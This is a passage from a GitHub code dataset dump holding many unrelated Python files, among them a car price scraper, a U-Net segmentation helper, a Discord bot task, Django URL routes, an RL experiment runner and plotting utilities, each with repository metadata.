pylev.levenshtein(text_version,\n                                                                                                    str(el_argus))\n        df_argus_fin_tmp = df_argus_tmp.append(df_argus_sub_tmp)\n        distance_min = df_argus_fin_tmp['select'].min()\n\n        argus_price = df_argus_fin_tmp[df_argus_fin_tmp['select'] == distance_min]['argus'].values[0]\n        db_zoe.loc[db_zoe.id == el, 'argus'] = float(argus_price)\n        db_zoe.loc[db_zoe.id == el, 'official_version'] = el_argus\n    return db_zoe\n\n# Good-deal indicator\ndef select_good_deal(db_zoe_to_select):\n    db_zoe_to_select['good_deal'] = db_zoe_to_select['price'] / db_zoe_to_select['argus']\n    db_zoe_to_select['select_deal'] = db_zoe_to_select['good_deal'].apply(lambda x: True if x < 1 else False)\n    return db_zoe_to_select\n\n\n\n\n# Populate the initial dataframe\ndf_zoe = extract_urls_car(region_list_full, url_base)\ndf_zoe_more = save_car_data(df_zoe)\n\ndf_argus = get_argus(df_zoe_more)\n\ndf_zoe_maj = maj_argus_zoe(df_zoe_more, df_argus)\n\ndf_zoe_final = select_good_deal(df_zoe_maj)\nexport_data_car(df_zoe_final)\n\nprint(df_zoe_final)\nprint(df_zoe.count())\nprint(df_zoe.corr())\n\n\n\n","repo_name":"SkatiRCI/starter-kit-datascience","sub_path":"westley-birmingham/Lesson4/exo_dom_lesson_4.py","file_name":"exo_dom_lesson_4.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} {"seq_id":"11679668939","text":"import numpy as np\nimport keras.backend as K\nimport keras\n\nSMOOTH = 0.001\n\n\n# Loss used to train the models (needed to load a keras model)\ndef real_dice_coef(y_true, y_pred):\n    intersection = K.sum(y_true * y_pred, axis=(1, 2, 3))\n    summation = K.sum(y_true, axis=(1, 2, 3)) + K.sum(y_pred, axis=(1, 2, 3))\n    return K.mean((2. 
* intersection + SMOOTH) / (summation + SMOOTH))\n\n\ndef real_dice_coef_loss(y_true, y_pred):\n    return - real_dice_coef(y_true, y_pred)\n\n\nkeras.losses.real_dice_coef_loss = real_dice_coef_loss\n\n\ndef get_mask(img, direction, model):\n    \"\"\"\n    For an input image of shape (384, 288, 384), apply a U-Net to each slice in direction X, Y or Z to output a mask\n    with the same shape where the 1s represent the nodules detected by the Unet\n    \"\"\"\n\n    # Load model\n    assert direction in ['X', 'Y', 'Z']\n\n    # Parameters\n    n_slices = 11 # The input of the U Net is not a single image but a volume of n_slices images\n    smin = n_slices // 2 # integer division so the slice indices below stay ints\n    smax = n_slices - smin\n    axis1 = {'X': (0, 1), 'Y': (0, 2), 'Z': (1, 2)}[direction]\n    axis2 = {'X': 2, 'Y': 1, 'Z': 0}[direction] # axis along which we crop and select slices\n\n    # We only extract masks on non empty slices located in the variable position\n    sum_axis = np.sum(img, axis=axis1)\n    inf = np.nonzero(sum_axis)[0][0]\n    sup = img.shape[axis2] - np.nonzero(sum_axis[::-1])[0][0]\n    inf = max(inf, smin)\n    sup = min(sup, img.shape[axis2] - smax + 1)\n    positions = np.arange(inf, sup, 1)\n    mask = np.zeros(img.shape)\n\n    for j, i in enumerate(positions):\n        inputs = np.take(img, range(i - smin, i + smax), axis=axis2)\n        inputs = np.rollaxis(inputs, axis2, 0)[None, None, :, :, :]\n        if direction == 'X':\n            mask[:, :, i] = model.predict(inputs)[0, 0]\n        elif direction == 'Y':\n            mask[:, i, :] = model.predict(inputs)[0, 0]\n        elif direction == 'Z':\n            mask[i, :, :] = model.predict(inputs)[0, 0]\n\n    mask = (mask > 0.5).astype('int16')\n    return mask\n","repo_name":"owkin/DSB2017","sub_path":"sje_scripts/nodule_segmentation.py","file_name":"nodule_segmentation.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"} {"seq_id":"8975489951","text":"# Boolean values\n\n# Numbers\na = 5\nb = a == 5 # True\nb = a != 5 # False\nb = a > 2 # True\nb = a < 4 # False\n\n# Strings\ns = 'abc'\nb = s == 'abc' # True\nb = s.find('a') >= 0 # check whether 'a' occurs, True\nb = s.find('e') > 0 # check whether 'e' occurs, False\nb = s.startswith('b') # check whether it starts with 'b', False\nb = s.endswith('c') # check whether it ends with 'c', True\n\n# Boolean operations\na = True\nb = False\nprint(a and b) # False\nprint(a or b) # True\nprint(not a) # False\n\nprint(a or b and (a or b) and not b)\n","repo_name":"lvancer/course_python","sub_path":"code/02/boolean.py","file_name":"boolean.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} {"seq_id":"38678806039","text":"import json\nimport asyncio\nimport os\nimport datetime\n\nfrom systems.logger import log\nfrom systems.varmanager import VarManager\n\n\nclass FishingGearHandler:\n    def __init__(self, client):\n        self.client = client\n        self.varmanager = VarManager()\n        self.fishing_channels = None\n        self.profiles_path = \"./local/fishing/profiles/\"\n        self.items_file = \"./data/fishing/items.json\"\n        self.profiles_list = []\n\n    async def check_gear(self):\n        await asyncio.sleep(10)\n        self.fishing_channels = self.collect_channel_ids()\n        log(f'[Fishing Gear Handler] - Starting profile searches')\n        while self.client:\n            current_time = datetime.datetime.now()\n            three_hours_ago = current_time - datetime.timedelta(hours=3)\n            self.find_profiles()\n            for profile in self.profiles_list:\n                user_id = profile.replace(\".json\", \"\")\n                with open(f'{self.profiles_path}{profile}', \"r\") as f:\n                    profile_data = json.load(f)\n                if not profile_data[\"gear\"]:\n                    continue\n                for item in 
profile_data[\"gear\"]:\n if datetime.datetime.fromisoformat(item[1]) < three_hours_ago:\n # remove item from userprofile\n profile_data[\"gear\"].remove(item)\n self.write_json(f'{self.profiles_path}{profile}', profile_data)\n # reset item status in shop\n with open(f'{self.items_file}', \"r\") as f:\n items_dict = json.load(f)\n items_dict[item[0]][2] = True\n self.write_json(f'{self.items_file}', items_dict)\n # message fishing channels\n for channel in self.fishing_channels:\n ch = self.client.get_channel(channel)\n await ch.send(f'```yaml\\n\\nRent time expired on {item[0]} for'\n f' {self.get_user_name(user_id)}```')\n await asyncio.sleep(2)\n\n await asyncio.sleep(60)\n\n def write_json(self, filepath, data):\n with open(filepath, \"w\") as f:\n json.dump(data, f, indent=4)\n\n def find_profiles(self):\n self.profiles_list = []\n for root, dirs, files in os.walk(self.profiles_path):\n for file in files:\n self.profiles_list.append(file)\n\n def collect_channel_ids(self):\n if self.varmanager.read(\"fishing_channels\"):\n fishing_channels = self.varmanager.read(\"fishing_channels\")\n return fishing_channels\n\n def get_user_name(self, user_id):\n if os.path.exists(f'./data/etc/ids.json'):\n with open(f'./data/etc/ids.json', \"r\") as f:\n id_data = json.load(f)\n if str(user_id) in id_data:\n return id_data[str(user_id)]\n","repo_name":"matte54/ProjectReggie","sub_path":"tasks/fishing_gear_keeper.py","file_name":"fishing_gear_keeper.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12694218579","text":"import training as m\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n res = request.args.get('s')\n response = m.response(res)\n\n return jsonify({\n 'request': res,\n 'status': 200,\n 'response': response\n })\n","repo_name":"tech-talent-oaxaca/pnl-tensorflow-react","sub_path":"api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33948411609","text":"import pandas as pd\nimport plotly_express as px\nimport plotly.io as pio\nimport plotly.graph_objs as go\n\n\nfull_df = pd.read_csv(\"./csv/active_sellers_apr_19.csv\")\n\ndef set_plotly_template():\n layout = go.Layout(\n title='Figure Title',\n font = dict(size= 14, family='Roboto', color='white'),\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n showlegend=False,\n xaxis=dict(\n autorange=True,\n showgrid=False,\n ),\n yaxis=dict(\n autorange=True,\n showgrid=False,\n )\n )\n fig = go.Figure(layout=layout)\n templated_fig = pio.to_templated(fig)\n pio.templates['no_background'] = templated_fig.layout.template\n return 'no_background'\n\nclass BonanzaSellers:\n def __init__(self):\n self.df = pd.read_csv(\"./csv/active_sellers_apr_19.csv\")\n self.col_options = [dict(label=x, value=x) for x in self.df.columns]\n self.category_options = [dict(label=x, value=x) for x in self.df.featured_category_id.unique()]\n self.value_em = [\"minnow\", \"sea_bass\", \"dolphin\", \"whale\"]\n self.template = set_plotly_template()\n self.color_dict = { 'Computers/Tablets & Networking' : '#A6CEE3',\n 'Parts & Accessories' : '#1E78B4',\n 'Fashion' : '#B2DF8A',\n 'Jewelry & Watches' : '#329F2C',\n 'a' : '#FB9A99',\n 'Home & Garden' : '#E3191B',\n 'Sports Mem, Cards & Fan Shop' : '#FDBF6F',\n 'Sporting Goods' : '#FF7F00',\n 'Health & Beauty' : 
'#C9B2D6',\n 'b' : '#6B3D9A',\n 'Other' : '#FFFF99',}\n\n\n def min_max_norm(self, values):\n normalized = []\n minimum = min(values)\n maximum = max(values)\n for value in values:\n normalized.append((value-minimum)/(maximum-minimum))\n return normalized\n\n def sample_sized(self, df):\n size = min(df.groupby(['value_em']).value_em.count())\n dff = []\n for value in self.value_em:\n dff.append(df[df.value_em == value].sample(size))\n return pd.concat(dff)\n \n\n def value_em_profit(self, df1, df2):\n dff = pd.concat([df1, df2])\n return px.box(\n dff,\n color=\"featured_category_id\",\n y=\"value_em\",\n x=\"profit_estimate\",\n template=\"no_background\",\n points=False,\n log_x=True,\n orientation='h',\n notched=True,\n title='Profit by Seller Value' ,\n )\n\n def orders_items(self, df1, df2):\n dff = pd.concat([df1, df2])\n dff.amount = dff.amount.fillna(0)\n return px.scatter(\n dff,\n color=\"featured_category_id\",\n y=\"offers\",\n x=\"days_as_user\",\n size='amount',\n template=\"no_background\",\n color_discrete_map = self.color_dict,\n title='Orders for # of Items',\n )\n\n\n def __str__(self):\n return '{} - Category Stats'\n\n def __repr__(self):\n return '{self.__class__.__name__}({self.df})'.format(self==self)\n\n\n\nclass CategoryTableData:\n def __init__(self, df, value_em):\n self.dff = df[df.value_em==value_em]\n self.value_em = value_em\n self.count = self.dff.seller_id.count()\n self.winning = \"{:.1%}\".format(sum(self.dff.is_winning)/self.dff.seller_id.count())\n self.dps = '${:,.0f}'.format(self.dff.profit_estimate.sum()/self.dff.seller_id.count())\n self.median_dps = '${:,.0f}'.format(self.dff.profit_estimate.median())\n self.days_as_user = round(self.dff.days_as_user.mean())\n self.first_sale = round(self.dff.days_to_sale.dropna().mean())\n self.orders = round(self.dff.offers.mean())\n self.items = round(self.dff.item_count.mean())\n #self.membership = \"{:.0%}\".format(self.dff.membership.value_counts()[1]/self.dff.seller_id.count())\n\n def __str__(self):\n return '{} - Category Stats'.format(' '.join(self.dff.columns[1].split(\"_\")).title())\n\n def __repr__(self):\n return '{self.__class__.__name__}({self.category})'.format(self==self)\n\n\nclass Facts:\n def __init__(self, df1, df2):\n self.df1 = df1\n self.df2 = df2\n self.num_sellers1 = self.df1.seller_id.count()\n self.num_sellers_width1 = 100\n self.num_sellers2 = self.df2.seller_id.count()\n self.order_value1 = '${:,.0f}'.format(self.df1.order_value.mean())\n self.order_value2 = '${:,.0f}'.format(self.df2.order_value.mean())\n self.num_orders1 = round(self.df1.offers.mean())\n self.num_orders2 = round(self.df2.offers.mean())\n self.fvf_per_seller1 = '${:,.0f}'.format(self.df1.sum_fvf.mean())\n self.fvf_per_seller2 = '${:,.0f}'.format(self.df2.sum_fvf.mean())\n self.gmv_per_seller1 = '${:,.0f}'.format(self.df1.amount.mean())\n self.gmv_per_seller2 = '${:,.0f}'.format(self.df2.amount.mean())\n\n\n\n\n\nif __name__ == \"__main__\":\n print(set_plotly_template())\n print(list(pio.templates))\n # cs = CategoryTableData(full_df, 'sea_bass')\n # print(cs.winning)","repo_name":"bonanzakevin/data_analysis","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32068889775","text":"# -*- coding: utf -8 -*-\n\nvalue = int(input())\n\ndata = [100, 50, 20, 10, 5, 2, 1]\n\nprint(value)\n\nfor v in data:\n\tn = value / v\n\tvalue = value % v\n\tprint('%d nota(s) de R$ %d,00' % (n, 
v))","repo_name":"gustavobiage/Paradigmas---INE5416","sub_path":"Atividade_II1/Treino/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16622915159","text":"import pytest\nfrom team import BackEndDeveloper, FrontEndDeveloper, TeamLead, DevelopmentTeam\n\n\ndef test_back_end_developer_work():\n back_end_dev = BackEndDeveloper()\n back_end_dev.work()\n\n\ndef test_back_end_developer_get_salary():\n back_end_dev = BackEndDeveloper()\n back_end_dev.get_salary()\n\n\ndef test_front_end_developer_work():\n front_end_dev = FrontEndDeveloper()\n front_end_dev.work()\n\n\ndef test_front_end_developer_get_salary():\n front_end_dev = FrontEndDeveloper()\n front_end_dev.get_salary()\n\n\ndef test_team_lead_work():\n back_end_dev = BackEndDeveloper()\n front_end_dev1 = FrontEndDeveloper()\n front_end_dev2 = FrontEndDeveloper()\n team_lead = TeamLead([back_end_dev, front_end_dev1, front_end_dev2])\n\n team_lead.work()\n\n\ndef test_team_lead_get_salary():\n back_end_dev = BackEndDeveloper()\n front_end_dev1 = FrontEndDeveloper()\n front_end_dev2 = FrontEndDeveloper()\n team_lead = TeamLead([back_end_dev, front_end_dev1, front_end_dev2])\n\n team_lead.get_salary()\n\n\ndef test_development_team_work():\n back_end_dev = BackEndDeveloper()\n front_end_dev1 = FrontEndDeveloper()\n front_end_dev2 = FrontEndDeveloper()\n team_lead = TeamLead([back_end_dev, front_end_dev1, front_end_dev2])\n development_team = DevelopmentTeam()\n development_team.add_member(back_end_dev)\n development_team.add_member(front_end_dev1)\n development_team.add_member(front_end_dev2)\n development_team.add_member(team_lead)\n\n development_team.work()\n\n\ndef test_development_team_add_member():\n development_team = DevelopmentTeam()\n back_end_dev = BackEndDeveloper()\n development_team.add_member(back_end_dev)\n\n front_end_dev = FrontEndDeveloper()\n development_team.add_member(front_end_dev)\n","repo_name":"YouRockGarnov/Python-OOP","sub_path":"task5/test_team.py","file_name":"test_team.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71020716266","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n \n# Importar el Data set\ndataset = pd.read_csv(\"Aqui va el dataset de tu agrado\")\nX = dataset.iloc[:, :-1].values \ny = dataset.iloc[:, 3].values \n\n# Tratamiento de los NAs\nfrom sklearn.impute import SimpleImputer\nimputer = SimpleImputer(missing_values = np.nan, strategy = \"mean\", verbose=0)\nimputer = imputer.fit(X[:,1:3]) \nX[:, 1:3] = imputer.transform(X[:,1:3])\n\n#categoria = contiene un valor no numerico que sirve para clasificar a las columnas nos sirve para clasificar ejemplo \n#puede multiplicar 5x dato\n#--------------------------------------------------------------------------------------------------------\n# Codificar datos categoricos\nfrom sklearn.preprocessing import LabelEncoder , OneHotEncoder #clasificacion de variables dummy \nfrom sklearn.compose import ColumnTransformer\n\nlabelencoder_X = LabelEncoder()\nX[:, 0] = labelencoder_X.fit_transform(X[:, 0])\nct = ColumnTransformer(\n [('one_hot_encoder', OneHotEncoder(categories='auto'), [0])], \n remainder='passthrough' \n)\n\n\nX = np.array(ct.fit_transform(X), dtype=np.float)\nlabelencoder_y = LabelEncoder()\ny = 
labelencoder_y.fit_transform(y)\n#--------------------------------------------------------------------------------------------------------\n\n# Dividir el data set en conjunto de entrenamiento y en conjunto de testing\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size = 0.2, random_state = 0)\n\n# Escalado de variables\nfrom sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\n","repo_name":"lfwzk/Terasoft.ec","sub_path":"template-preprocesado.py","file_name":"template-preprocesado.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72483605547","text":"\"\"\"NetworkBootManagementSystem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n# -*- coding:utf-8 -*-\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom networkbootsystem import views\n# 上传的文件能直接通过url打开,以及setting中设置\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.index, name='index'),\n url(r'^back_manage$', views.back_manage, name='back_manage'),\n\n url(r'^macupper$', views.mac_upper, name='macupper'), # MAC转换成大写\n\n # url(r'^$', 'login.viewss.login_view', name='login_view'),\n url(r'^boot$', views.boot_select, name='boot_select'),\n url(r'^select_boot_control.html', views.select_boot_control, name='select_boot_control'),\n url(r'^manage/', include('networkbootsystem.urls_iso'), name='manage_iso'),\n url(r'^manage/', include('networkbootsystem.urls_clonezilla'), name='manage_clonezilla'),\n\n\n # url(r'^pxelog/', include('networkbootsystem.urls_iso_log'), name='pxelog_iso'),\n\n url(r'^logs/', include('networkbootsystem.urls_clonezilla_log'), name='log_clonezilla'),\n url(r'^logs/', include('networkbootsystem.urls_iso_log'), name='log_iso'),\n url(r'^document$', views.document, name='document'),\n url(r'^complete_request$', views.complete_request, name='complete_request'),\n url(r'^start_request$', views.start_request, name='start_request'),\n\n url(r'^user/', include('networkbootsystem.urls_user'), name='manage_user'),\n\n url(r'^update_logs$', views.update_logs, name='update_logs'),\n url(r'^get_new_version$', views.get_new_version, name='get_new_version'),\n\n url(r'^computer/', include('networkbootsystem.urls_computer_info'), name='computer'),\n\n url(r'^other/', include('networkbootsystem.urls_batfile'), name='other'),\n\n url(r'^show_current_select_boot$', views.show_current_select_boot, name='show_current_select_boot'),\n\n url(r'^schedule/', include('networkbootsystem.urls_schedule')),\n url(r'^questionbank/', include('networkbootsystem.urls_questionbank')),\n\n]\n\n# 上传的文件能直接通过url打开\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, 
document_root=settings.MEDIA_ROOT)\n\n","repo_name":"istarmeow/NetworkBootManagementSystem","sub_path":"NetworkBootManagementSystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39687093362","text":"import webbrowser\r\n\r\nclass Movie():\r\n \"\"\" This class stores movie information such as title, poster image, youtube trailer \"\"\"\r\n # class constructor\r\n def __init__(\r\n self, movie_title,\r\n poster_image_url,\r\n trailer_youtube_url\r\n ):\r\n # instance variables\r\n self.title = movie_title\r\n self.poster_image_url = poster_image_url\r\n self.trailer_youtube_url = trailer_youtube_url\r\n\r\n\r\n \r\n","repo_name":"swatisuman0690/my-movie-trailer-website","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379321067","text":"import csv\n\nfrom absl import logging\nfrom tensorflow.compat.v1.io import gfile\n\n\ndef _ema(base, val, decay=0.995):\n return base * decay + (1 - decay) * val\n\n\ndef run(env, agent, num_episodes, report_every=200, num_eval_reps=1):\n \"\"\"Runs an agent on an environment.\n\n Args:\n env: The environment.\n agent: The agent.\n num_episodes: Number of episodes to train for.\n report_every: Frequency at which training progress are reported (episodes).\n num_eval_reps: Number of eval episodes to run per training episode.\n\n Returns:\n A list of dicts containing training and evaluation returns, and a list of\n reported returns smoothed by EMA.\n \"\"\"\n\n returns = []\n logged_returns = []\n train_return_ema = 0.\n eval_return_ema = 0.\n for episode in range(num_episodes):\n returns.append(dict(episode=episode))\n\n # Run a training episode.\n train_episode_return = run_episode(env, agent, is_training=True)\n train_return_ema = _ema(train_return_ema, train_episode_return)\n returns[-1][\"train\"] = train_episode_return\n\n # Run an evaluation episode.\n returns[-1][\"eval\"] = []\n for _ in range(num_eval_reps):\n eval_episode_return = run_episode(env, agent, is_training=False)\n eval_return_ema = _ema(eval_return_ema, eval_episode_return)\n returns[-1][\"eval\"].append(eval_episode_return)\n\n if ((episode + 1) % report_every) == 0 or episode == 0:\n logged_returns.append(\n dict(episode=episode, train=train_return_ema, eval=[eval_return_ema]))\n logging.info(\"Episode %s, avg train return %.3f, avg eval return %.3f\",\n episode + 1, train_return_ema, eval_return_ema)\n if hasattr(agent, \"get_logs\"):\n logging.info(\"Episode %s, agent logs: %s\", episode + 1,\n agent.get_logs())\n\n return returns, logged_returns\n\n\ndef run_episode(environment, agent, is_training=False):\n \"\"\"Run a single episode.\"\"\"\n\n timestep = environment.reset()\n\n while not timestep.last():\n action = agent.step(timestep, is_training)\n new_timestep = environment.step(action)\n\n if is_training:\n agent.update(timestep, action, new_timestep)\n\n timestep = new_timestep\n\n episode_return = environment.episode_return\n\n return episode_return\n\n\ndef write_returns_to_file(path, returns):\n \"\"\"Write returns to file.\"\"\"\n\n with gfile.GFile(path, \"w\") as file:\n writer = csv.writer(file, delimiter=\" \", quoting=csv.QUOTE_MINIMAL)\n writer.writerow([\"episode\", \"train\"] +\n [f\"eval_{idx}\" for idx in range(len(returns[0][\"eval\"]))])\n for row in returns:\n 
writer.writerow([row[\"episode\"], row[\"train\"]] + row[\"eval\"])\n","repo_name":"deepmind/deepmind-research","sub_path":"option_keyboard/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"21150074704","text":"from collections import deque\n\n\nclass Solution:\n def shortestDistance(self, grid: List[List[int]]) -> int:\n # Complexity: O(|NUM_BUILDINGS| * i * j)\n self.code = lambda x: x[0] * len(grid[0]) + x[1]\n self.num_locations = 0\n self.num_buildings = 0\n self.visitable_by = [[0 for j in range(len(grid[0]))] for i in range(len(grid))]\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 0:\n self.num_locations += 1\n elif grid[i][j] == 1:\n self.num_buildings += 1\n\n grid[i][j] = -grid[i][j]\n\n\n if self.num_locations == 0:\n return -1\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == -1:\n self.bfs(grid, i, j)\n\n # print(grid)\n ret = 100000\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] >= 0 and self.visitable_by[i][j] == self.num_buildings:\n ret = min(grid[i][j], ret)\n\n if ret == 100000:\n return -1\n return ret\n\n\n def bfs(self, grid: List[List[int]], i: int, j: int) -> int:\n queue = deque()\n queue.append((i, j, 0))\n visited = set()\n visited.add(self.code((i, j)))\n\n while len(queue) > 0:\n r, c, level = queue.popleft()\n new_level = level + 1\n\n if r > 0 and grid[r - 1][c] >= 0:\n code = self.code((r - 1, c))\n if code not in visited:\n grid[r - 1][c] = grid[r - 1][c] + new_level\n queue.append((r - 1, c, new_level))\n visited.add(code)\n self.visitable_by[r - 1][c] += 1\n\n\n if r < len(grid) - 1 and grid[r + 1][c] >= 0:\n code = self.code((r + 1, c))\n if code not in visited:\n grid[r + 1][c] = grid[r + 1][c] + new_level\n queue.append((r + 1, c, new_level))\n visited.add(code)\n self.visitable_by[r + 1][c] += 1\n\n\n if c > 0 and grid[r][c - 1] >= 0:\n code = self.code((r, c - 1))\n if code not in visited:\n grid[r][c - 1] = grid[r][c - 1] + new_level\n queue.append((r, c - 1, new_level))\n visited.add(code)\n self.visitable_by[r][c - 1] += 1\n\n if c < len(grid[0]) - 1 and grid[r][c + 1] >= 0:\n code = self.code((r, c + 1))\n if code not in visited:\n grid[r][c + 1] = grid[r][c + 1] + new_level\n queue.append((r, c + 1, new_level))\n visited.add(code)\n self.visitable_by[r][c + 1] += 1\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/317. 
Shortest Distance from All Buildings/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"16300306057","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\n\ndef plot_run(results, standalone=True):\n if standalone:\n plt.subplots(figsize=(15, 15))\n\n plt.subplot(3, 3, 1)\n plt.title('Position Graph')\n plt.plot(results['time'], results['x'], label='x')\n plt.plot(results['time'], results['y'], label='y')\n plt.plot(results['time'], results['z'], label='z')\n plt.xlabel('time, seconds')\n plt.ylabel('Position')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 2)\n plt.title('Velocity Graph')\n plt.plot(results['time'], results['x_velocity'], label='x')\n plt.plot(results['time'], results['y_velocity'], label='y')\n plt.plot(results['time'], results['z_velocity'], label='z')\n plt.xlabel('time, seconds')\n plt.ylabel('Velocity')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 3)\n plt.title('Orientation Graph')\n plt.plot(results['time'], results['phi'], label='phi')\n plt.plot(results['time'], results['theta'], label='theta')\n plt.plot(results['time'], results['psi'], label='psi')\n plt.xlabel('time, seconds')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 4)\n plt.title('Angular Velocity Graph')\n plt.plot(results['time'], results['phi_velocity'], label='phi')\n plt.plot(results['time'], results['theta_velocity'], label='theta')\n plt.plot(results['time'], results['psi_velocity'], label='psi')\n plt.xlabel('time, seconds')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 5)\n plt.title('Rotor Speed Graph')\n plt.plot(results['time'], results['rotor_speed1'], label='Rotor 1')\n plt.plot(results['time'], results['rotor_speed2'], label='Rotor 2')\n plt.plot(results['time'], results['rotor_speed3'], label='Rotor 3')\n plt.plot(results['time'], results['rotor_speed4'], label='Rotor 4')\n plt.xlabel('time, seconds')\n plt.ylabel('Rotor Speed, revolutions / second')\n plt.grid(True)\n if standalone:\n plt.legend()\n\n plt.subplot(3, 3, 6)\n plt.title('Reward Graph')\n plt.plot(results['time'], results['reward'], label='Reward')\n plt.xlabel('time, seconds')\n plt.ylabel('Reward')\n if standalone:\n plt.legend(loc=3)\n ax2 = plt.twinx()\n ax2.plot(results['time'], np.cumsum(results['reward']), color='xkcd:red', label='Accum. 
Reward')\n ax2.set_ylabel('Accumulated Reward')\n if standalone:\n ax2.legend(loc=4)\n plt.grid(True)\n\n if standalone:\n plt.tight_layout()\n plt.show()\n\nclass SetupPlot():\n def __init__(self, fileName,task):\n # Setup\n self.labels = ['time', 'x', 'y', 'z', 'phi', 'theta', 'psi', 'x_velocity',\n 'y_velocity', 'z_velocity', 'phi_velocity', 'theta_velocity',\n 'psi_velocity', 'rotor_speed1', 'rotor_speed2', 'rotor_speed3', 'rotor_speed4','reward']\n self.results = {x : [] for x in self.labels}\n self.task=task\n self.fileName=fileName\n # Run the simulation, and save the results.\n with open(self.fileName, 'w') as csvfile:\n self.writer = csv.writer(csvfile)\n self.writer.writerow(self.labels)\n def writeResults(self,reward,action):\n action=list(action)*4\n with open(self.fileName, 'a') as csvfile:\n self.writer = csv.writer(csvfile)\n to_write = [self.task.sim.time] + list(self.task.sim.pose) + list(self.task.sim.v) + list(self.task.sim.angular_v) + list(action)+[reward]\n for ii in range(len(self.labels)):\n self.results[self.labels[ii]].append(to_write[ii])\n self.writer.writerow(to_write)\n return self.results","repo_name":"CheloGE/MachineLearningProjects","sub_path":"RL-Quadcopter-2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22722277652","text":"from sys import stdin\r\n\r\nn = int(stdin.readline().strip(\"\\n\"))\r\n\r\nexp = stdin.readline().strip(\"\\n\")\r\n\r\n\r\ndef compute(a, b, op):\r\n if op == '+':\r\n return a + b\r\n elif op == '-':\r\n return a - b\r\n elif op == '*':\r\n return a * b\r\n elif op == '/':\r\n return a / b\r\n\r\n\r\nstack = []\r\ntemp = []\r\nfor i in range(n):\r\n temp.append(int(stdin.readline()))\r\n\r\nfor i in exp:\r\n if i != '*' and i != '/' and i != '-' and i != '+':\r\n stack.append(temp[ord(i)-65])\r\n else:\r\n b = stack.pop()\r\n a = stack.pop()\r\n c = compute(a, b, i)\r\n stack.append(c)\r\n\r\nprint(\"{0:.2f}\".format(stack.pop()))\r\n","repo_name":"student079/Algorithm","sub_path":"후위 표기식2_백준1935.py","file_name":"후위 표기식2_백준1935.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23954674150","text":"from utils.loggerX import Logger\nfrom utils.prompt_factory import PromptFactory\n\nlogger = Logger(__name__)\n\nclass RecipeAssistant:\n def __init__(self, settings, recommendation_model, recipe_model, recommendation_parser, recipe_parser, recommendation_prompt_template, recipe_prompt_template):\n self.settings = settings\n self.reccomendation_model = recommendation_model\n self.recipe_model = 